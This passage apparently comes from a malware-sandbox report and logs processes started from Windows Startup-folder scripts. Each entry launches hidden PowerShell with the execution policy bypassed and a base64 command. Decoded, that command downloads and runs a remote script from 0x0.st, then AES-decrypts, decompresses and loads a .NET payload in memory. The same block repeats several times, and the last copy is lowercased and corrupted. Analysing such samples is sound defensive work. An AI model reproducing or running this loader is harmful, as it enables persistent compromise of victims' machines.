N0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_47a8d5aa.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b38e7755.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_50006331.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_1baed2c6.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_aa280a72.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsr